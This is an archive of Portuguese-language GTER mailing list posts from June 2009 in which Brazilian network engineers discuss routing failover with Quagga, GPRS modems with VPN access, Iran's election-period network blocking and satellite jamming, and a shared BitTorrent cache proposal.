Tue Jun 23 20:30:11 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Tue, 23 Jun 2009 19:30:11 -0400 Subject: [GTER] Iran Message-ID: <4A416583.8070600@jarruda.com> Recentemente os malucos..errr..pesquisadores la do asert publicaram alguns artigos sobre Iran e etc.. http://asert.arbornetworks.com/ From humberto at hss.blog.br Tue Jun 23 21:06:39 2009 From: humberto at hss.blog.br (Humberto Sartini) Date: Tue, 23 Jun 2009 21:06:39 -0300 Subject: [GTER] Fwd: Problema com Speedy In-Reply-To: <367456.68746.qm@web53705.mail.re2.yahoo.com> References: <367456.68746.qm@web53705.mail.re2.yahoo.com> Message-ID: Pessoal, Olhando o site da Telef?nica percebemos que est?o fazendo algo: http://www15.telefonica.com.br/sp/cotacao/ Depois selecionem "Infraestrutura de Rede". Tem gente na lista que vai gostar !!! -- [ ]'s Humberto Sartini Certificado LPIC-1 http://www.hss.blog.br PGP KEY ID 0xB32E5C8D On Tue, Jun 23, 2009 at 5:43 PM, Mauricio Maehara < mauriciomaehara at yahoo.com.br> wrote: > > Assunto: Problema com Speedy > > > Para quem quiser abrir uma denuncia no Procon: > > http://www.procon.sp.gov.br/denunciaspeedy/ > > > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From lscrlstld at gmail.com Tue Jun 23 23:10:13 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Tue, 23 Jun 2009 23:10:13 -0300 Subject: [GTER] RES: Iran In-Reply-To: <4A416583.8070600@jarruda.com> References: <4A416583.8070600@jarruda.com> Message-ID: S? esqueceu de mencionar o flood gigantesco de SMS enviado +- duas horas depois do encerramento da elei??o, logo ap?s houve o bloqueio. > > Recentemente os malucos..errr..pesquisadores la do asert > publicaram alguns artigos sobre Iran e etc.. > http://asert.arbornetworks.com/ > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From gustkiller at gmail.com Tue Jun 23 19:26:55 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Tue, 23 Jun 2009 19:26:55 -0300 Subject: [GTER] bgp failover In-Reply-To: References: Message-ID: <276fbe8b0906231526u560bd25excbace303e714eb01@mail.gmail.com> com ospf, vc vai poder fazer redundancia e balanceamento de rotas de forma bem pratica. 2009/6/23 Itamar Reis Peixoto > s?o links ponto-a-ponto ? > > creio que existam outras alternativas melhores do que BGP > > > 2009/6/23 Hitch Cock : > > Prezados, > > > > algu?m teria um exemplo de configura??o do quagga em um ambiente bgp de > > acordo com o senario abaixo > > > > |---------- LINK1 ------------| > > site-a site-b > > |---------- LINK2 ------------| > > > > Tenho algumas redes que v?o pelo LINK1 e outras pelo LINK2. Caso algum > dos > > links fique indispon?vel todo o tr?fego seja direcionado para o link > > dispon?vel. > > > > No site-a tenho as redes 192.168.100/24 192.168.200/24 172.16.1/24 e no > > site-b tenho 192.168.101/24 192.168.201/24 10.4/16 10.5.0/24 > > > > O site-b sai para a internet atrav?s do site-a. > > > > Grato, > > Hitch > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > -- > ------------ > > Itamar Reis Peixoto > > e-mail/msn: itamar at ispbrasil.com.br > sip: itamar at ispbrasil.com.br > skype: itamarjp > icq: 81053601 > +55 11 4063 5033 > +55 34 3221 8599 > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From tasso.faria at gmail.com Tue Jun 23 20:47:12 2009 From: tasso.faria at gmail.com (Tasso Faria) Date: Tue, 23 Jun 2009 20:47:12 -0300 Subject: [GTER] Modem/Router GPRS + VPN Message-ID: <911af4340906231647y501e4290i132a698e581007cf@mail.gmail.com> Pessoal, Algu?m recomenda algum modem/router GPRS que permita o estabelecimento de VPN com um ponto concentrador? Ou seja, a inten??o ? controlar esta rede e seu endere?amento. Gostaria de utilizar o mesmo para o processo de medi??o de distribui??o de energia. Baixo custo e facilidade de entrega s?o bem vindos! Aceito sugest?es. Agrade?o desde j?, Tasso From rosauro at rline.com.br Tue Jun 23 22:07:06 2009 From: rosauro at rline.com.br (Rosauro - RLINE) Date: Tue, 23 Jun 2009 22:07:06 -0300 Subject: [GTER] Contato CLARO Message-ID: <4A417C3A.8020303@rline.com.br> Boa noite, temos algu?m da CLARO aqui na lista ? gostaria de entrar em contato em pvt. Atenciosamente, Rosauro Baretta From mantunes.listas at gmail.com Wed Jun 24 00:32:08 2009 From: mantunes.listas at gmail.com (mantunes) Date: Wed, 24 Jun 2009 00:32:08 -0300 Subject: [GTER] Modem/Router GPRS + VPN In-Reply-To: <911af4340906231647y501e4290i132a698e581007cf@mail.gmail.com> References: <911af4340906231647y501e4290i132a698e581007cf@mail.gmail.com> Message-ID: veja este modelos http://www.tropinet.com.br/gsm-gprs.html 2009/6/23 Tasso Faria : > Pessoal, > > Algu?m recomenda algum modem/router GPRS que permita o estabelecimento de > VPN com um ponto concentrador? Ou seja, a inten??o ? controlar esta rede e > seu endere?amento. > > Gostaria de utilizar o mesmo para o processo de medi??o de distribui??o de > energia. > Baixo custo e facilidade de entrega s?o bem vindos! > > Aceito sugest?es. > > Agrade?o desde j?, > Tasso > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- Marcio Antunes Powered by FreeBSD ================================== * Windows: "Where do you want to go tomorrow?" * Linux: "Where do you want to go today?" * FreeBSD: "Are you, guys, comming or what?" From net.hitch.adm at gmail.com Wed Jun 24 00:59:44 2009 From: net.hitch.adm at gmail.com (Hitch Cock) Date: Wed, 24 Jun 2009 00:59:44 -0300 Subject: [GTER] bgp failover In-Reply-To: <276fbe8b0906231526u560bd25excbace303e714eb01@mail.gmail.com> References: <276fbe8b0906231526u560bd25excbace303e714eb01@mail.gmail.com> Message-ID: Prezados, vou testar as solu??es propostas. Agrade?o a todos pelas informa??es. At, Hitch 2009/6/23 Gustavo Santos > com ospf, vc vai poder fazer redundancia e balanceamento de rotas de forma > bem pratica. > > 2009/6/23 Itamar Reis Peixoto > > > s?o links ponto-a-ponto ? > > > > creio que existam outras alternativas melhores do que BGP > > > > > > 2009/6/23 Hitch Cock : > > > Prezados, > > > > > > algu?m teria um exemplo de configura??o do quagga em um ambiente bgp de > > > acordo com o senario abaixo > > > > > > |---------- LINK1 ------------| > > > site-a site-b > > > |---------- LINK2 ------------| > > > > > > Tenho algumas redes que v?o pelo LINK1 e outras pelo LINK2. Caso algum > > dos > > > links fique indispon?vel todo o tr?fego seja direcionado para o link > > > dispon?vel. > > > > > > No site-a tenho as redes 192.168.100/24 192.168.200/24 172.16.1/24 e no > > > site-b tenho 192.168.101/24 192.168.201/24 10.4/16 10.5.0/24 > > > > > > O site-b sai para a internet atrav?s do site-a. > > > > > > Grato, > > > Hitch > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > > > > > -- > > ------------ > > > > Itamar Reis Peixoto > > > > e-mail/msn: itamar at ispbrasil.com.br > > sip: itamar at ispbrasil.com.br > > skype: itamarjp > > icq: 81053601 > > +55 11 4063 5033 > > +55 34 3221 8599 > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From jarruda-gter at jarruda.com Wed Jun 24 08:14:12 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Wed, 24 Jun 2009 07:14:12 -0400 Subject: [GTER] Modem/Router GPRS + VPN In-Reply-To: <911af4340906231647y501e4290i132a698e581007cf@mail.gmail.com> References: <911af4340906231647y501e4290i132a698e581007cf@mail.gmail.com> Message-ID: <4A420A84.1000207@jarruda.com> Tasso Faria wrote: > Pessoal, > > Algu?m recomenda algum modem/router GPRS que permita o estabelecimento de > VPN com um ponto concentrador? Ou seja, a inten??o ? controlar esta rede e > seu endere?amento. > > Gostaria de utilizar o mesmo para o processo de medi??o de distribui??o de > energia. > Baixo custo e facilidade de entrega s?o bem vindos! Se nao me engano, a empresa de eletricidade de Trinidad&Tobago usava algo assim. Vou verificar se ainda tenho um contato que trabalhou no projeto a varios anos atras.. > > Aceito sugest?es. > > Agrade?o desde j?, > Tasso > -- > gter list https://eng.registro.br/mailman/listinfo/gter From jarruda-gter at jarruda.com Wed Jun 24 16:47:24 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Wed, 24 Jun 2009 15:47:24 -0400 Subject: [GTER] RES: Iran In-Reply-To: References: <4A416583.8070600@jarruda.com> Message-ID: <4A4282CC.2070508@jarruda.com> Toledo, Luis Carlos wrote: > S? esqueceu de mencionar o flood gigantesco de SMS enviado +- duas horas > depois do encerramento da elei??o, logo ap?s houve o bloqueio. > Uma curiosidade aidicional Em ao menos um pais do Caribe, onde a alguns anos tiveram uns atentados a bomba, a rede SS7 dos celulares deu umas 'quedas'.. O problema foi relacionado com a quantidade de pessoas ligando ao mesmo tempo, da capital, de uma regiao especifica. Redes SS7, no meu parco conhecimento, apesar de muito robustas, sao muito 'estaticas', e se nao forem dimensionadas para tratar estes 'eventos anormais', nao seguram o rojao. SMS, pelo que sei, nao trafega sobre IP, e sim sobre SS7 ? >> Recentemente os malucos..errr..pesquisadores la do asert >> publicaram alguns artigos sobre Iran e etc.. >> http://asert.arbornetworks.com/ >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From frederick at dahype.org Wed Jun 24 17:24:37 2009 From: frederick at dahype.org (Renato Frederick) Date: Wed, 24 Jun 2009 16:24:37 -0400 Subject: [GTER] RES: RES: Iran In-Reply-To: <4A4282CC.2070508@jarruda.com> References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> Message-ID: Levando o assunto para outro lado, desculpe se ficar offtopic, mas lendo o asert me vem a d?vida: No dia atual ? poss?vel isolar efetivamente uma localidade de acesso total para a Internet? Imagino que no caso Brasil em que trocamos tr?fego com v?rios provedores Internacionais por diversos provedores locais, uma manobra no BGP de todos os provedores, deixando de receber AS's e publicando d? conta do recado. Em pa?ses em que o governo ? o ?nico respons?vel pelo provimento de Internet ou links internacionais, como era Embratel no Brasil a anos, fica mais f?cil ainda. Por?m, como fica acesso Internet via Sat?lite? Quando um regime opressivo tamb?m tira TV's fora do ar, canais de sat?lite pegos com parab?lica com ou banda Ku continuariam a funcionar - me corrijam se estive errado - bem como acesso Internet. Enfim, felizmente todos os parentes e amigos que tenho n?o vivem em pa?ses com este tipo de governo, ent?o n?o tenho a m?nima id?ia de como ? e de 'jeitinho' para contornar, claro podendo pagar com a pr?pria cabe?a. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Julio Arruda > Enviada em: quarta-feira, 24 de junho de 2009 16:47 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] RES: Iran > > Toledo, Luis Carlos wrote: > > S? esqueceu de mencionar o flood gigantesco de SMS enviado +- duas > horas > > depois do encerramento da elei??o, logo ap?s houve o bloqueio. > > > > Uma curiosidade aidicional > Em ao menos um pais do Caribe, onde a alguns anos tiveram uns atentados > a bomba, a rede SS7 dos celulares deu umas 'quedas'.. > > O problema foi relacionado com a quantidade de pessoas ligando ao mesmo > tempo, da capital, de uma regiao especifica. > > Redes SS7, no meu parco conhecimento, apesar de muito robustas, sao > muito 'estaticas', e se nao forem dimensionadas para tratar estes > 'eventos anormais', nao seguram o rojao. > > SMS, pelo que sei, nao trafega sobre IP, e sim sobre SS7 ? > > > >> Recentemente os malucos..errr..pesquisadores la do asert > >> publicaram alguns artigos sobre Iran e etc.. > >> http://asert.arbornetworks.com/ > >> > >> -- > >> gter list https://eng.registro.br/mailman/listinfo/gter > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From danton at inexo.com.br Wed Jun 24 18:09:39 2009 From: danton at inexo.com.br (Danton Nunes) Date: Wed, 24 Jun 2009 18:09:39 -0300 (BRT) Subject: [GTER] RES: RES: Iran In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> Message-ID: On Wed, 24 Jun 2009, Renato Frederick wrote: > Por?m, como fica acesso Internet via Sat?lite? Quando um regime > opressivo tamb?m tira TV's fora do ar, canais de sat?lite pegos com > parab?lica com ou banda Ku continuariam a funcionar - me corrijam se > estive errado - bem como acesso Internet. o Iran vem sistematicamente 'jamming' o sat?lite que retransmite a BBC e a CNN, isto ?, praticando uma esp?cie de DoS. From lscrlstld at gmail.com Wed Jun 24 18:50:29 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Wed, 24 Jun 2009 18:50:29 -0300 Subject: [GTER] RES: Modem/Router GPRS + VPN In-Reply-To: <911af4340906231647y501e4290i132a698e581007cf@mail.gmail.com> References: <911af4340906231647y501e4290i132a698e581007cf@mail.gmail.com> Message-ID: <59A668CD24A742F1BE009731833757F1@toledoPC> Na verdade existe uma outra forma de conectar a rede ip formada pelo dispositivos gprs e sua rede interna. Eu imagino que seja isso que vc queira. Abs Toledo > > Pessoal, > > Algu?m recomenda algum modem/router GPRS que permita o > estabelecimento de VPN com um ponto concentrador? Ou seja, a > inten??o ? controlar esta rede e seu endere?amento. > > Gostaria de utilizar o mesmo para o processo de medi??o de > distribui??o de energia. > Baixo custo e facilidade de entrega s?o bem vindos! > > Aceito sugest?es. > > Agrade?o desde j?, > Tasso > -- > gter list https://eng.registro.br/mailman/listinfo/gter From lscrlstld at gmail.com Wed Jun 24 18:53:05 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Wed, 24 Jun 2009 18:53:05 -0300 Subject: [GTER] RES: RES: RES: Iran In-Reply-To: References: <4A416583.8070600@jarruda.com><4A4282CC.2070508@jarruda.com> Message-ID: Existe um revez politico na est?ria, chegando a teoria da conspira??o, mas a? t? mais que off... > On Wed, 24 Jun 2009, Renato Frederick wrote: > > > Por?m, como fica acesso Internet via Sat?lite? Quando um regime > > opressivo tamb?m tira TV's fora do ar, canais de sat?lite pegos com > > parab?lica com ou banda Ku continuariam a funcionar - me > corrijam se > > estive errado - bem como acesso Internet. > > o Iran vem sistematicamente 'jamming' o sat?lite que > retransmite a BBC e a CNN, isto ?, praticando uma esp?cie de DoS. > -- From lscrlstld at gmail.com Wed Jun 24 18:56:41 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Wed, 24 Jun 2009 18:56:41 -0300 Subject: [GTER] RES: RES: Iran In-Reply-To: <4A4282CC.2070508@jarruda.com> References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> Message-ID: > Toledo, Luis Carlos wrote: > > S? esqueceu de mencionar o flood gigantesco de SMS enviado +- duas > > horas depois do encerramento da elei??o, logo ap?s houve o bloqueio. > > > > Uma curiosidade aidicional > Em ao menos um pais do Caribe, onde a alguns anos tiveram uns > atentados a bomba, a rede SS7 dos celulares deu umas 'quedas'.. > > O problema foi relacionado com a quantidade de pessoas > ligando ao mesmo tempo, da capital, de uma regiao especifica. > > Redes SS7, no meu parco conhecimento, apesar de muito > robustas, sao muito 'estaticas', e se nao forem dimensionadas > para tratar estes 'eventos anormais', nao seguram o rojao. > > SMS, pelo que sei, nao trafega sobre IP, e sim sobre SS7 ? > Os SMSCs podem utilizar IP para facilitar a integra??o, principalmente com SMS Gateways de "n?o-telcos" From provedorbogus at gmail.com Wed Jun 24 15:05:11 2009 From: provedorbogus at gmail.com (Provedor Bogus) Date: Wed, 24 Jun 2009 15:05:11 -0300 Subject: [GTER] Cache de BitTorrent Message-ID: <5e00a4be0906241105k569ed888j8fe2e6abdc07222c@mail.gmail.com> Caros colegas, Primeiramente pe?o desculpas se essa n?o ? a melhor lista para tratar deste assunto. H? algum tempo consultamos empresas (PeerApp e Oversi) sobre o custo de implanta??o de um cache de P2P e nos assustamos com o custo do hardware e principalmente do software, completamente invi?veis para qualquer empresa de pequeno e m?dio porte s? sendo justific?vel para carriers. Assim, somos um provedor pequeno do interior do estado do Rio de Janeiro e desenvolvemos uma solu??o de cache transparente para BitTorrent (futuramente servir? tamb?m para a rede eDonkey). N?o gostar?amos de nos identificar porque ainda estamos levantando os aspectos jur?dicos da proposta que trazemos e contaremos tamb?m com as respostas de outros interessados para formular nossa forma de funcionamento. Sobre o c?digo desenvolvido, o cache funciona perfeitamente, ? escalon?vel, pode ser dividido em v?rias m?quinas para quest?es de alta disponibilidade e consome pouca CPU podendo ser executado numa m?quina Linux com 16 GB de RAM e aconselhamos um processador Core i7 b?sico. Nossa m?quina de produ??o tem exatamente essa configura??o e custou cerca de R$ 2.800 com placa-m?e Supermicro. O problema atual ? que possu?mos pouco volume de tr?fego para popular o cache e com isso o hit ratio alcan?ado fica em torno de 6%, sendo que o desej?vel ? qualquer coisa acima de 35%. Por isso estamos recorrendo a esta lista. A id?ia ? que outros provedores (fora do Rio de Janeiro, por quest?es de mercado) tamb?m possuam uma m?quina de cache que ir? compartilhar o nosso servidor de conte?do (que ? uma m?quina com 4 processadores Quad-Xeon e 64 GB de RAM) de 45 TB. O modelo de neg?cios s? fica interessante se pudermos utilizar um link de Internet mais barato do que os contratados das carriers e por isso os interessados dever?o estar conectados ao NAP das Am?ricas na Terremark. Espera-se com isso baixar o custo de link para o tr?fego P2P sem diminuir a qualidade para o usu?rio final. Se algu?m estiver interessado em participar disso, por favor, envie uma mensagem privada. Atenciosamente, Provedor Bogus From olarva at gmail.com Wed Jun 24 13:20:05 2009 From: olarva at gmail.com (Lauro Cesar de Oliveira) Date: Wed, 24 Jun 2009 13:20:05 -0300 Subject: [GTER] DNSSEC and DNSCurve Message-ID: <31f2f4aa0906240920t43d0f3ddjf2f2f48087713e3a@mail.gmail.com> Sauda??es. Participei de um debate no FISL 10, DNSSEC X DNSCurve. Algum colega utilizando alguma implementa??o do DNSCurve? -- Lauro Cesar de Oliveira http://www.gurulinux.blog.br Hack to learn not learn to hack. From mustardahc at gmail.com Wed Jun 24 15:19:43 2009 From: mustardahc at gmail.com (BadTrip) Date: Wed, 24 Jun 2009 15:19:43 -0300 Subject: [GTER] bgp failover In-Reply-To: References: <276fbe8b0906231526u560bd25excbace303e714eb01@mail.gmail.com> Message-ID: O mais simples pra balancear eh configurar duas rotas est?ticas com mesma m?trica, uma apontando para cada link. Se forem links ponto a ponto melhor ainda beleza, se nao, crie um tunnel GRE em cima de cada link e aponte a rota para o tunnel, assim se o link falhar o tunnel cai e a rota perde a validade na tabela de roteamento, caso contr?rio, vc pode acabar mandando pacotes para um link com falhas. Abraco. 2009/6/24 Hitch Cock > Prezados, > > vou testar as solu??es propostas. Agrade?o a todos pelas informa??es. > > At, > Hitch > > 2009/6/23 Gustavo Santos > > > com ospf, vc vai poder fazer redundancia e balanceamento de rotas de > forma > > bem pratica. > > > > 2009/6/23 Itamar Reis Peixoto > > > > > s?o links ponto-a-ponto ? > > > > > > creio que existam outras alternativas melhores do que BGP > > > > > > > > > 2009/6/23 Hitch Cock : > > > > Prezados, > > > > > > > > algu?m teria um exemplo de configura??o do quagga em um ambiente bgp > de > > > > acordo com o senario abaixo > > > > > > > > |---------- LINK1 ------------| > > > > site-a site-b > > > > |---------- LINK2 ------------| > > > > > > > > Tenho algumas redes que v?o pelo LINK1 e outras pelo LINK2. Caso > algum > > > dos > > > > links fique indispon?vel todo o tr?fego seja direcionado para o link > > > > dispon?vel. > > > > > > > > No site-a tenho as redes 192.168.100/24 192.168.200/24 172.16.1/24 e > no > > > > site-b tenho 192.168.101/24 192.168.201/24 10.4/16 10.5.0/24 > > > > > > > > O site-b sai para a internet atrav?s do site-a. > > > > > > > > Grato, > > > > Hitch > > > > -- > > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > > > > > > > > > > -- > > > ------------ > > > > > > Itamar Reis Peixoto > > > > > > e-mail/msn: itamar at ispbrasil.com.br > > > sip: itamar at ispbrasil.com.br > > > skype: itamarjp > > > icq: 81053601 > > > +55 11 4063 5033 > > > +55 34 3221 8599 > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- BrCaBadT From tullio at dualtec.com.br Wed Jun 24 12:04:16 2009 From: tullio at dualtec.com.br (Tullio Bertoldi Christianini) Date: Wed, 24 Jun 2009 12:04:16 -0300 Subject: [GTER] RES: Modem/Router GPRS + VPN In-Reply-To: References: <911af4340906231647y501e4290i132a698e581007cf@mail.gmail.com> Message-ID: Mantunes, vc sabe se esse equipamento da Tropinet permite VPN IP-SEC ? Att. Tullio -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de mantunes Enviada em: quarta-feira, 24 de junho de 2009 00:32 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] Modem/Router GPRS + VPN veja este modelos http://www.tropinet.com.br/gsm-gprs.html 2009/6/23 Tasso Faria : > Pessoal, > > Algu?m recomenda algum modem/router GPRS que permita o estabelecimento de > VPN com um ponto concentrador? Ou seja, a inten??o ? controlar esta rede e > seu endere?amento. > > Gostaria de utilizar o mesmo para o processo de medi??o de distribui??o de > energia. > Baixo custo e facilidade de entrega s?o bem vindos! > > Aceito sugest?es. > > Agrade?o desde j?, > Tasso > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- Marcio Antunes Powered by FreeBSD ================================== * Windows: "Where do you want to go tomorrow?" * Linux: "Where do you want to go today?" * FreeBSD: "Are you, guys, comming or what?" -- gter list https://eng.registro.br/mailman/listinfo/gter From leolistas at solutti.com.br Wed Jun 24 14:31:41 2009 From: leolistas at solutti.com.br (Leonardo Rodrigues) Date: Wed, 24 Jun 2009 14:31:41 -0300 Subject: [GTER] Modem/Router GPRS + VPN In-Reply-To: <911af4340906231647y501e4290i132a698e581007cf@mail.gmail.com> References: <911af4340906231647y501e4290i132a698e581007cf@mail.gmail.com> Message-ID: <4A4262FC.8070000@solutti.com.br> Tasso Faria escreveu: > Pessoal, > > Algu?m recomenda algum modem/router GPRS que permita o estabelecimento de > VPN com um ponto concentrador? Ou seja, a inten??o ? controlar esta rede e > seu endere?amento. > > Gostaria de utilizar o mesmo para o processo de medi??o de distribui??o de > energia. > Baixo custo e facilidade de entrega s?o bem vindos! > > N?o ? bem um equipamento, mas vai uma dica. Algumas operadoras de celular (Vivo e TIM eu tenho certeza pois j? participei de projetos de implementa??o com essas) oferecem um servi?o de rede corporativa em cima de GPRS. Basicamente voc? vai configurar seu modem com uma nova APN e n?o a APN de internet da operadora. Nessa nova APN, um servidor radius seu que vai fazer autentica??o do usu?rio/senha informados. O IP, portanto, pode ser designado pelo seu radius baseado no que voc? quiser. Eu j? distribui IP baseado no usu?rio/senha e tamb?m no telefone (Calling-Station-Id). Tenho um projeto rodando que usu?rio/senha ? ?nico pra rede inteira, eu mudo o IP baseado no telefone de origem. E como tenho uma rela??o do telefone com o equipamento em quest?o, eu consigo sempre saber qual ? o IP daquele dispositivo. Uma vez estabelecida a conex?o e recebido o IP que seu radius mandou, aquele IP roteia tr?fego direto pra voc?, sem precisar de fechar VPN entre o ponto GPRS. Na implanta??o, geralmente existe uma VPN sim entre a operadora de telefonia e a sua empresa. L2TP+IPSec, GRE, IPSEC ... j? vi v?rios modelos diferentes de operadoras diferentes. Mas a? feita toda essa parte de VPN entre voc? e a operadora, no dispositivo GPRS a configura??o ? trivial: APN, usu?rio e senha. N?o sei qual ? a sua necessidade ... mas caso voc? esteja planejando utilizar uma ?nica operadora, que seria interessante pra fechar um contrato de volume de dados, verifique a possibilidade de utilizar esses servi?os de VPN da pr?pria operadora. Dessa forma, voc? simplifica imensamente a configura??o das pontas, permitindo utilizar qualquer dispositivo embarcado com suporte a GPRS, eliminando a necessidade de VPN na ponta. -- Atenciosamente / Sincerily, Leonardo Rodrigues Solutti Tecnologia http://www.solutti.com.br Minha armadilha de SPAM, N?O mandem email gertrudes at solutti.com.br My SPAMTRAP, do not email it From carlos.laviola at gmail.com Wed Jun 24 17:37:25 2009 From: carlos.laviola at gmail.com (=?UTF-8?B?Q2FybNC+cyBMYXZp0L5sYQ==?=) Date: Wed, 24 Jun 2009 17:37:25 -0300 Subject: [GTER] RES: RES: Iran In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> Message-ID: <4b0fe2bb0906241337v186d7548ibeb8b760ccb5aa90@mail.gmail.com> 2009/6/24 Renato Frederick : > Por?m, como fica acesso Internet via Sat?lite? Quando um regime opressivo tamb?m tira TV's fora do ar, canais de sat?lite pegos com parab?lica com ou banda Ku continuariam a funcionar - me corrijam se estive errado - bem como acesso Internet. N?o, a? entram os "jammers". Qualquer coisa que transmita no espectro ? bloque?vel. > Enfim, felizmente todos os parentes e amigos que tenho n?o vivem em pa?ses com este tipo de governo, ent?o n?o tenho a m?nima id?ia de como ? e de 'jeitinho' para contornar, claro podendo pagar com a pr?pria cabe?a. > > > > > >> -----Mensagem original----- >> De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] >> Em nome de Julio Arruda >> Enviada em: quarta-feira, 24 de junho de 2009 16:47 >> Para: Grupo de Trabalho de Engenharia e Operacao de Redes >> Assunto: Re: [GTER] RES: Iran >> >> Toledo, Luis Carlos wrote: >> > S? esqueceu de mencionar o flood gigantesco de SMS enviado +- duas >> horas >> > depois do encerramento da elei??o, logo ap?s houve o bloqueio. >> > >> >> Uma curiosidade aidicional >> Em ao menos um pais do Caribe, onde a alguns anos tiveram uns atentados >> a bomba, a rede SS7 dos celulares deu umas 'quedas'.. >> >> O problema foi relacionado com a quantidade de pessoas ligando ao mesmo >> tempo, da capital, de uma regiao especifica. >> >> Redes SS7, no meu parco conhecimento, apesar de muito robustas, sao >> muito 'estaticas', e se nao forem dimensionadas para tratar estes >> 'eventos anormais', nao seguram o rojao. >> >> SMS, pelo que sei, nao trafega sobre IP, e sim sobre SS7 ? >> >> >> >> Recentemente os malucos..errr..pesquisadores la do asert >> >> publicaram alguns artigos sobre Iran e etc.. >> >> http://asert.arbornetworks.com/ >> >> >> >> -- >> >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > >> > -- >> > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From net.hitch.adm at gmail.com Thu Jun 25 00:26:48 2009 From: net.hitch.adm at gmail.com (Hitch Cock) Date: Thu, 25 Jun 2009 00:26:48 -0300 Subject: [GTER] bgp failover In-Reply-To: References: <276fbe8b0906231526u560bd25excbace303e714eb01@mail.gmail.com> Message-ID: Tenho um ponto-a-ponto e uma vpn com a "Telec?mica", estava partindo para o ospf com quagga, vai dar rock? 2009/6/24 BadTrip > O mais simples pra balancear eh configurar duas rotas est?ticas com mesma > m?trica, uma apontando para cada link. > > Se forem links ponto a ponto melhor ainda beleza, se nao, crie um tunnel > GRE > em cima de cada link e aponte a rota para o tunnel, assim se o link falhar > o > tunnel cai e a rota perde a validade na tabela de roteamento, caso > contr?rio, vc pode acabar mandando pacotes para um link com falhas. > > Abraco. > > 2009/6/24 Hitch Cock > > > Prezados, > > > > vou testar as solu??es propostas. Agrade?o a todos pelas informa??es. > > > > At, > > Hitch > > > > 2009/6/23 Gustavo Santos > > > > > com ospf, vc vai poder fazer redundancia e balanceamento de rotas de > > forma > > > bem pratica. > > > > > > 2009/6/23 Itamar Reis Peixoto > > > > > > > s?o links ponto-a-ponto ? > > > > > > > > creio que existam outras alternativas melhores do que BGP > > > > > > > > > > > > 2009/6/23 Hitch Cock : > > > > > Prezados, > > > > > > > > > > algu?m teria um exemplo de configura??o do quagga em um ambiente > bgp > > de > > > > > acordo com o senario abaixo > > > > > > > > > > |---------- LINK1 ------------| > > > > > site-a site-b > > > > > |---------- LINK2 ------------| > > > > > > > > > > Tenho algumas redes que v?o pelo LINK1 e outras pelo LINK2. Caso > > algum > > > > dos > > > > > links fique indispon?vel todo o tr?fego seja direcionado para o > link > > > > > dispon?vel. > > > > > > > > > > No site-a tenho as redes 192.168.100/24 192.168.200/24 172.16.1/24 > e > > no > > > > > site-b tenho 192.168.101/24 192.168.201/24 10.4/16 10.5.0/24 > > > > > > > > > > O site-b sai para a internet atrav?s do site-a. > > > > > > > > > > Grato, > > > > > Hitch > > > > > -- > > > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > > > > > > > > > > > > > > > -- > > > > ------------ > > > > > > > > Itamar Reis Peixoto > > > > > > > > e-mail/msn: itamar at ispbrasil.com.br > > > > sip: itamar at ispbrasil.com.br > > > > skype: itamarjp > > > > icq: 81053601 > > > > +55 11 4063 5033 > > > > +55 34 3221 8599 > > > > -- > > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > -- > BrCaBadT > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From lscrlstld at gmail.com Thu Jun 25 09:46:40 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Thu, 25 Jun 2009 09:46:40 -0300 Subject: [GTER] RES: Modem/Router GPRS + VPN In-Reply-To: <4A4262FC.8070000@solutti.com.br> References: <911af4340906231647y501e4290i132a698e581007cf@mail.gmail.com> <4A4262FC.8070000@solutti.com.br> Message-ID: Isso se vc tiver volume para negociar, uma segunda op??o e comprar os chips de empresas tipo "carrier brocker", que tem todo esse aparato t?cnico j? implantando, e atende clientes com pouco volume. Abs Toledo > > Tasso Faria escreveu: > > Pessoal, > > > > Algu?m recomenda algum modem/router GPRS que permita o > estabelecimento > > de VPN com um ponto concentrador? Ou seja, a inten??o ? > controlar esta > > rede e seu endere?amento. > > > > Gostaria de utilizar o mesmo para o processo de 